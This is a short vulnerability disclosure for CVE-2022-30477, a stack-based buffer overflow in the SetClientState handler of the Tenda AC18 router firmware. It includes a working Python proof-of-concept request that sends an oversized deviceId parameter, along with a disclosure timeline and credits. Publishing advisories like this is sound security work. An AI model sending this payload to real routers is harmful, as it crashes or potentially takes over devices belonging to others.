This vulnerability lies in the /goform/SetClientState page which influences the lastest version of Tenda Router AC18. (The latest version is AC18_V15.03.05.19(6318))
There is a stack-based buffer overflow vulnerability in function formSetClientState.
In function formSetClientState it reads user provided parameter deviceId into v9, and this variable is passed into function sprintf without any length check, which may overflow the stack-based buffer s.
So by requesting the page /goform/SetClientState, the attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.
import requests
IP = "10.10.10.1"
url = f"http://{IP}/goform/SetClientState?"
url += "limitEn=1&deviceId=" + "s" * 0x500
response = requests.get(url)- 2022-05-07: Report to CVE & CNVD;
- 2022-05-26: CVE ID assigned (CVE-2022-30477)
- 2022-05-30: CNVD ID assigned (CNVD-2022-41849)
Credit to @peanuts, @Minghao Lin and @cylin.